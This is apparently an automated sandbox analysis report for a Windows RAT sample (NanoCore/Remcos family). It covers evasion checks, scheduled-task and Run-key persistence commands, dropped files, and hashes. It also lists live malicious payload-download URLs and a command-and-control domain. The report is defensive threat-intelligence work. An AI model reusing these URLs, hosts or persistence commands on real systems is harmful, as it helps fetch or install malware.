Tries to detect Any.run

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Program Files\qga\qga.exe

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe	RDTSC instruction interceptor: First address: 00000000004F6455 second address: 00000000004F6455 instructions:
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe	RDTSC instruction interceptor: First address: 00000000004F3C04 second address: 00000000004F3C04 instructions:

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 6580	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 6028	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 3560	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Process information queried: ProcessInformation

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread information set: HideFromDebugger
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread information set: HideFromDebugger

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Process queried: DebugPort

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Process token adjusted: Debug

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp167E.tmp'
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp19AB.tmp'

Language, Device and Operating System Detection:

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scheduled Task/Job1	Scheduled Task/Job1	Process Injection11	Masquerading2	OS Credential Dumping	Security Software Discovery41	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	DLL Side-Loading1	Scheduled Task/Job1	Virtualization/Sandbox Evasion23	LSASS Memory	Virtualization/Sandbox Evasion23	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	DLL Side-Loading1	Disable or Modify Tools1	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection11	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Hidden Files and Directories1	LSA Secrets	System Information Discovery22	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information1	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	DLL Side-Loading1	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Variant.Razy.845229.13077.exe	33%	Virustotal		Browse
SecuriteInfo.com.Variant.Razy.845229.13077.exe	36%	ReversingLabs	Win32.Trojan.Razy
SecuriteInfo.com.Variant.Razy.845229.13077.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	0%	Metadefender		Browse
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	0%	ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
mtspsmjeli.sch.id	12%	Virustotal		Browse
ghsgatvxbznmklopwagdhusvxbznxgtewuahjkop.ydns.eu	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://mtspsmjeli.sch.id/cl/Maly%20nanocre%202021_ECMFFfzt176.bin	15%	Virustotal		Browse
http://mtspsmjeli.sch.id/cl/Maly%20nanocre%202021_ECMFFfzt176.bin	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
mtspsmjeli.sch.id	103.150.60.242	true	true	12%, Virustotal, Browse	unknown
ghsgatvxbznmklopwagdhusvxbznxgtewuahjkop.ydns.eu	10.2.118.40	true	false	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://mtspsmjeli.sch.id/cl/Maly%20nanocre%202021_ECMFFfzt176.bin	true	15%, Virustotal, Browse Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
103.150.60.242	unknown	unknown		45325	PC24NET-AS-IDPTPC24TelekomunikasiIndonesiaID	true

Private

IP
10.2.118.40

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	356594
Start date:	23.02.2021
Start time:	11:52:47
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 39s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	SecuriteInfo.com.Variant.Razy.845229.13077.24263 (renamed file extension from 24263 to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	36
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.evad.winEXE@13/9@7/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 8.8% (good quality ratio 1.2%) Quality average: 5.1% Quality standard deviation: 10.1%
HCA Information:	Successful, ratio: 83% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Override analysis time to 240s for sample files taking high CPU consumption
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. TCP Packets have been reduced to 100 Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, HxTsr.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 51.104.144.132, 131.253.33.200, 13.107.22.200, 93.184.220.29, 13.64.90.137, 13.88.21.125, 92.122.145.220, 104.43.139.144, 168.61.161.212, 184.30.20.56, 51.103.5.186, 8.248.117.254, 8.253.207.120, 8.253.204.121, 8.248.147.254, 67.26.75.254, 51.104.139.180, 92.122.213.247, 92.122.213.194, 52.155.217.156, 20.54.26.129 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, cs9.wac.phicdn.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, vip2-par02p.wns.notify.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:57:31	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
11:57:32	Task Scheduler	Run new task: DHCP Monitor path: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" s>$(Arg0)
11:57:33	API Interceptor	35x Sleep call for process: RegAsm.exe modified
11:57:34	Task Scheduler	Run new task: DHCP Monitor Task path: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" s>$(Arg0)

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
103.150.60.242	SecuriteInfo.com.Variant.Razy.845229.27038.exe	Get hash	malicious	Browse	mtspsmjeli.sch.id/cl/Jice_remcos%202_tfkxJbdn252.bin
	Lowes_Quotation_PN1092021.xlsx	Get hash	malicious	Browse	mtspsmjeli.sch.id/Img/VOP.exe
	4AtUJN8Hdu.exe	Get hash	malicious	Browse	mtspsmjeli.sch.id/cl/VK_Remcos%20v2_AxaGIU151.bin
	XP 6.xlsx	Get hash	malicious	Browse	mtspsmjeli.sch.id/Img/CUN.exe
	Emirates NDB bank_Remittance.xlsx	Get hash	malicious	Browse	mtspsmjeli.sch.id/Img/AWT.exe
	TT.xlsx	Get hash	malicious	Browse	mtspsmjeli.sch.id/cl/TT_2021_Remcos%20v2_DDoOoaFhuj99.bin
	w0JlVAbpIT.exe	Get hash	malicious	Browse	mtspsmjeli.sch.id/cl/wazzyfeb2021_XEeStqfpQ150.bin
	3661RJTi5M.exe	Get hash	malicious	Browse	mtspsmjeli.sch.id/cl/VK_Remcos%20v2_AxaGIU151.bin
	TgrhfQLDyB.exe	Get hash	malicious	Browse	mtspsmjeli.sch.id/cl/XP_remcos%202021_HzUYr10.bin
	Bjdl7RO0K8.exe	Get hash	malicious	Browse	mtspsmjeli.sch.id/cl/wazzyfeb2021_XEeStqfpQ150.bin
	4hW0TZqN01.exe	Get hash	malicious	Browse	mtspsmjeli.sch.id/cl/Mekino_nanocore_RYgvWj50.bin
	vTQWcy77WI.exe	Get hash	malicious	Browse	mtspsmjeli.sch.id/cl/VK_Remcos%20v2_AxaGIU151.bin
	LdOgPDsMEf.exe	Get hash	malicious	Browse	mtspsmjeli.sch.id/cl/XP_remcos%202021_HzUYr10.bin
	6QlgtXWPBZ.exe	Get hash	malicious	Browse	mtspsmjeli.sch.id/cl/VK_Remcos%20v2_AxaGIU151.bin
	OXplew3YfS.exe	Get hash	malicious	Browse	mtspsmjeli.sch.id/cl/Eric_2021_XfqsmM221.bin
	pWokqkAwi2.exe	Get hash	malicious	Browse	mtspsmjeli.sch.id/cl/VK_Remcos%20v2_AxaGIU151.bin
	FT102038332370.xlsx	Get hash	malicious	Browse	mtspsmjeli.sch.id/Img/OSE.exe
	UOB bank_Remittance_Form.xlsx	Get hash	malicious	Browse	mtspsmjeli.sch.id/Img/AQT.exe
	Payment Confirmation .xlsx	Get hash	malicious	Browse	mtspsmjeli.sch.id/Img/AET.exe
	Sales Acknowledgement SA00004804.doc	Get hash	malicious	Browse	mtspsmjeli.sch.id/Img/UDI.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
mtspsmjeli.sch.id	SecuriteInfo.com.Variant.Razy.845229.27038.exe	Get hash	malicious	Browse	103.150.60.242
	Lowes_Quotation_PN1092021.xlsx	Get hash	malicious	Browse	103.150.60.242
	4AtUJN8Hdu.exe	Get hash	malicious	Browse	103.150.60.242
	XP 6.xlsx	Get hash	malicious	Browse	103.150.60.242
	Emirates NDB bank_Remittance.xlsx	Get hash	malicious	Browse	103.150.60.242
	TT.xlsx	Get hash	malicious	Browse	103.150.60.242
	w0JlVAbpIT.exe	Get hash	malicious	Browse	103.150.60.242
	3661RJTi5M.exe	Get hash	malicious	Browse	103.150.60.242
	TgrhfQLDyB.exe	Get hash	malicious	Browse	103.150.60.242
	Bjdl7RO0K8.exe	Get hash	malicious	Browse	103.150.60.242
	4hW0TZqN01.exe	Get hash	malicious	Browse	103.150.60.242
	vTQWcy77WI.exe	Get hash	malicious	Browse	103.150.60.242
	LdOgPDsMEf.exe	Get hash	malicious	Browse	103.150.60.242
	6QlgtXWPBZ.exe	Get hash	malicious	Browse	103.150.60.242
	OXplew3YfS.exe	Get hash	malicious	Browse	103.150.60.242
	pWokqkAwi2.exe	Get hash	malicious	Browse	103.150.60.242
	FT102038332370.xlsx	Get hash	malicious	Browse	103.150.60.242
	UOB bank_Remittance_Form.xlsx	Get hash	malicious	Browse	103.150.60.242
	Payment Confirmation .xlsx	Get hash	malicious	Browse	103.150.60.242
	Sales Acknowledgement SA00004804.doc	Get hash	malicious	Browse	103.150.60.242

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
PC24NET-AS-IDPTPC24TelekomunikasiIndonesiaID	SecuriteInfo.com.Variant.Razy.845229.27038.exe	Get hash	malicious	Browse	103.150.60.242
	Lowes_Quotation_PN1092021.xlsx	Get hash	malicious	Browse	103.150.60.242
	4AtUJN8Hdu.exe	Get hash	malicious	Browse	103.150.60.242
	XP 6.xlsx	Get hash	malicious	Browse	103.150.60.242
	Emirates NDB bank_Remittance.xlsx	Get hash	malicious	Browse	103.150.60.242
	TT.xlsx	Get hash	malicious	Browse	103.150.60.242
	w0JlVAbpIT.exe	Get hash	malicious	Browse	103.150.60.242
	3661RJTi5M.exe	Get hash	malicious	Browse	103.150.60.242
	TgrhfQLDyB.exe	Get hash	malicious	Browse	103.150.60.242
	Bjdl7RO0K8.exe	Get hash	malicious	Browse	103.150.60.242
	4hW0TZqN01.exe	Get hash	malicious	Browse	103.150.60.242
	vTQWcy77WI.exe	Get hash	malicious	Browse	103.150.60.242
	LdOgPDsMEf.exe	Get hash	malicious	Browse	103.150.60.242
	6QlgtXWPBZ.exe	Get hash	malicious	Browse	103.150.60.242
	OXplew3YfS.exe	Get hash	malicious	Browse	103.150.60.242
	pWokqkAwi2.exe	Get hash	malicious	Browse	103.150.60.242
	FT102038332370.xlsx	Get hash	malicious	Browse	103.150.60.242
	UOB bank_Remittance_Form.xlsx	Get hash	malicious	Browse	103.150.60.242
	Payment Confirmation .xlsx	Get hash	malicious	Browse	103.150.60.242
	Sales Acknowledgement SA00004804.doc	Get hash	malicious	Browse	103.150.60.242

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	document.exe	Get hash	malicious	Browse
	w0JlVAbpIT.exe	Get hash	malicious	Browse
	Bjdl7RO0K8.exe	Get hash	malicious	Browse
	4hW0TZqN01.exe	Get hash	malicious	Browse
	d4e475d7d17a16be8b9eeac6e10b25af.exe	Get hash	malicious	Browse
	e5bd3238d220c97cd4d6969abb3b33e0.exe	Get hash	malicious	Browse
	1c2dec9cbfcd95afe13bf71910fdf95f.exe	Get hash	malicious	Browse
	Xf6v0G2wIM.exe	Get hash	malicious	Browse
	jztWD1iKrC.exe	Get hash	malicious	Browse
	wH22vdkhhU.exe	Get hash	malicious	Browse
	AqpOn6nwXS.exe	Get hash	malicious	Browse
	CklrD7MYX2.exe	Get hash	malicious	Browse
	FahZG6Pdc4.exe	Get hash	malicious	Browse
	61WlCsQR9Q.exe	Get hash	malicious	Browse
	U7DiqWP9qu.exe	Get hash	malicious	Browse
	d4x5rI09A7.exe	Get hash	malicious	Browse
	1WW425NrsA.exe	Get hash	malicious	Browse
	Kyd6mztyQ5.exe	Get hash	malicious	Browse
	xdNg7FUNS2.exe	Get hash	malicious	Browse
	14muK1SuRQ.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	53248
Entropy (8bit):	4.490095782293901
Encrypted:	false
SSDEEP:	768:0P2Bbv+VazyoD2z9TU//1mz1+M9GnLEu+2wTFRJS8Ulg:HJv46yoD2BTNz1+M9GLfOw8UO
MD5:	529695608EAFBED00ACA9E61EF333A7C
SHA1:	68CA8B6D8E74FA4F4EE603EB862E36F2A73BC1E5
SHA-256:	44F129DE312409D8A2DF55F655695E1D48D0DB6F20C5C7803EB0032D8E6B53D0
SHA-512:	8FE476E0185B2B0C66F34E51899B932CB35600C753D36FE102BDA5894CDAA58410044E0A30FDBEF76A285C2C75018D7C5A9BA0763D45EC605C2BBD1EBB9ED674
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: document.exe, Detection: malicious, Browse Filename: w0JlVAbpIT.exe, Detection: malicious, Browse Filename: Bjdl7RO0K8.exe, Detection: malicious, Browse Filename: 4hW0TZqN01.exe, Detection: malicious, Browse Filename: d4e475d7d17a16be8b9eeac6e10b25af.exe, Detection: malicious, Browse Filename: e5bd3238d220c97cd4d6969abb3b33e0.exe, Detection: malicious, Browse Filename: 1c2dec9cbfcd95afe13bf71910fdf95f.exe, Detection: malicious, Browse Filename: Xf6v0G2wIM.exe, Detection: malicious, Browse Filename: jztWD1iKrC.exe, Detection: malicious, Browse Filename: wH22vdkhhU.exe, Detection: malicious, Browse Filename: AqpOn6nwXS.exe, Detection: malicious, Browse Filename: CklrD7MYX2.exe, Detection: malicious, Browse Filename: FahZG6Pdc4.exe, Detection: malicious, Browse Filename: 61WlCsQR9Q.exe, Detection: malicious, Browse Filename: U7DiqWP9qu.exe, Detection: malicious, Browse Filename: d4x5rI09A7.exe, Detection: malicious, Browse Filename: 1WW425NrsA.exe, Detection: malicious, Browse Filename: Kyd6mztyQ5.exe, Detection: malicious, Browse Filename: xdNg7FUNS2.exe, Detection: malicious, Browse Filename: 14muK1SuRQ.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....{Z..................... .......... ........@.. ..............................N.....@.....................................O................................... ................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\RegAsm.exe.log Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	20
Entropy (8bit):	3.6841837197791887
Encrypted:	false
SSDEEP:	3:QHXMKas:Q3Las
MD5:	B3AC9D09E3A47D5FD00C37E075A70ECB
SHA1:	AD14E6D0E07B00BD10D77A06D68841B20675680B
SHA-256:	7A23C6E7CCD8811ECDF038D3A89D5C7D68ED37324BAE2D4954125D9128FA9432
SHA-512:	09B609EE1061205AA45B3C954EFC6C1A03C8FD6B3011FF88CF2C060E19B1D7FD51EE0CB9D02A39310125F3A66AA0146261BDEE3D804F472034DF711BC942E316
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\dhcpmon.exe.log Download File
Process:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	20
Entropy (8bit):	3.6841837197791887
Encrypted:	false
SSDEEP:	3:QHXMKas:Q3Las
MD5:	B3AC9D09E3A47D5FD00C37E075A70ECB
SHA1:	AD14E6D0E07B00BD10D77A06D68841B20675680B
SHA-256:	7A23C6E7CCD8811ECDF038D3A89D5C7D68ED37324BAE2D4954125D9128FA9432
SHA-512:	09B609EE1061205AA45B3C954EFC6C1A03C8FD6B3011FF88CF2C060E19B1D7FD51EE0CB9D02A39310125F3A66AA0146261BDEE3D804F472034DF711BC942E316
Malicious:	false
Preview:	1,"fusion","GAC",0..

C:\Users\user\AppData\Local\Temp\tmp167E.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1319
Entropy (8bit):	5.133606110275315
Encrypted:	false
SSDEEP:	24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0mne5xtn:cbk4oL600QydbQxIYODOLedq3Ze5j
MD5:	C6F0625BF4C1CDFB699980C9243D3B22
SHA1:	43DE1FE580576935516327F17B5DA0C656C72851
SHA-256:	8DFC4E937F0B2374E3CED25FCE344B0731CF44B8854625B318D50ECE2DA8F576
SHA-512:	9EF2DBD4142AD0E1E6006929376ECB8011E7FFC801EE2101E906787D70325AD82752DF65839DE9972391FA52E1E5974EC1A5C7465A88AA56257633EBB7D70969
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

C:\Users\user\AppData\Local\Temp\tmp19AB.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1310
Entropy (8bit):	5.109425792877704
Encrypted:	false
SSDEEP:	24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0R3xtn:cbk4oL600QydbQxIYODOLedq3S3j
MD5:	5C2F41CFC6F988C859DA7D727AC2B62A
SHA1:	68999C85FC7E37BAB9216E0099836D40D4545C1C
SHA-256:	98B6E66B6C2173B9B91FC97FE51805340EFDE978B695453742EBAB631018398B
SHA-512:	B5DA5DA378D038AFBF8A7738E47921ED39F9B726E2CAA2993D915D9291A3322F94EFE8CCA6E7AD678A670DB19926B22B20E5028460FCC89CEA7F6635E7557334
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
File Type:	Non-ISO extended-ASCII text, with no line terminators
Category:	dropped
Size (bytes):	8
Entropy (8bit):	2.5
Encrypted:	false
SSDEEP:	3:39t:39t
MD5:	9C203C9B758291F4B1AF069610D92B5D
SHA1:	D7B825402FFFD08C882A3B05129E92D0FE964CAE
SHA-256:	38D43DB6662484B3E873AC23026A9FE20E80B322579039F4B25AEB8E60318A42
SHA-512:	37325EB6DB0F73E3225B962E7263F76E7102835DB54495F4A23D4B22B56906EFEE14A446374C48E0DEF60E4E590BF04E032129AD54D2680E72B5D2891C600853
Malicious:	true
Preview:	:.HA5..H

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\task.dat Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	56
Entropy (8bit):	4.787365359936823
Encrypted:	false
SSDEEP:	3:oMty8WbSXgL4A:oMLWuQL4A
MD5:	EFD1636CFC3CC38FD7BABAE5CAC9EDE0
SHA1:	4D7D378ABEB682EEFBD039930C0EA996FBF54178
SHA-256:	F827D5B11C1EB3902D601C3E0B59BA32FE11C0B573FBF22FB2AF86BFD4651BBA
SHA-512:	69B2B0AB1A6E13395EF52DCB903B8E17D842E6D0D44F801FF2659CFD5EC343C8CC57928B02961FC7099AD43FF05633BAF5AC39042A00C8676D4FA8F6F8C2A5D7
Malicious:	false
Preview:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

\Device\ConDrv Download File
Process:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	236
Entropy (8bit):	4.932081504780073
Encrypted:	false
SSDEEP:	3:RGXKRjN3Mxm8fWWD2XBQFwuSaKwDDxRZjmKXVM8xUvAkIDaMAfFAqmV/l7pgechG:zx3M7J4BYRZBXVwLL0dxKaRFfnYJin
MD5:	3140AF53A08CE269E95F15F02653B5CA
SHA1:	1248AB171A7006A8972B07C8128E346C4E3C1E4E
SHA-256:	041D7B8A2F516085263D3022FCD2B716AD212FE564DC2CB5AC5D7E128BEAA257
SHA-512:	BB4DFF011D831D8CD6BA923E440B5B4C2A41BA118BA3D73AF0CC866C2FAD23003ACA86C27691E8CF9F37CA336A329D4B8683CFB70E3BF4BD8A5C5421E4DF62D3
Malicious:	false
Preview:	Microsoft (R) .NET Framework Assembly Registration Utility 2.0.50727.8922..Copyright (C) Microsoft Corporation 1998-2004. All rights reserved.....RegAsm : error RA0000 : Unable to locate input assembly '0' or one of its dependencies...

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
